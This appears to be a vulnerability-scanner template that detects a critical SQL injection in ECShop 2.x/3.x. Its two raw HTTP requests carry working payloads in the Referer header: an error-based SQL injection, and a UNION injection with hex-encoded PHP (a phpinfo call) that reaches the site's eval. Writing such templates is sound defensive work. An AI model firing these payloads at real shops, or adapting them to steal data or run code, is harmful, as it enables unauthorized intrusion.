id: ecshop-sqli

info:
  name: ECShop 2.x/3.x - SQL Injection
  author: Lark-lab,ImNightmaree,ritikchaddha
  severity: critical
  description: |
    ECShop 2.x and 3.x contain a SQL injection vulnerability that can allow an attacker to inject arbitrary SQL statements via the Referer header field and the dangerous eval function, possibly allowing the attacker to obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
    - http://www.wins21.com/mobile/blog/blog_view.html?num=1172
    - https://www.shutingrz.com/post/ad_hack-ec_exploit/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
    cpe: cpe:2.3:a:shopex:ecshop:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="ECShop"
    product: ecshop
    vendor: shopex
  tags: sqli,php,ecshop

http:
  - raw:
      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - '[error] =>'
          - '[0] => Array'
          - 'MySQL server error report:Array'
        condition: and
# digest: 4a0a0047304502206ae19ddacb5cd0a11d11d3cb8793d7121c5d0d7f5c8ad8ceea78984d1e3d21af022100ea16e46aa1a4b2e740c7bf702abeb7d45a7084a89415042de640ee29a07f7d0c:922c64590222798bb761d5b6d8e72950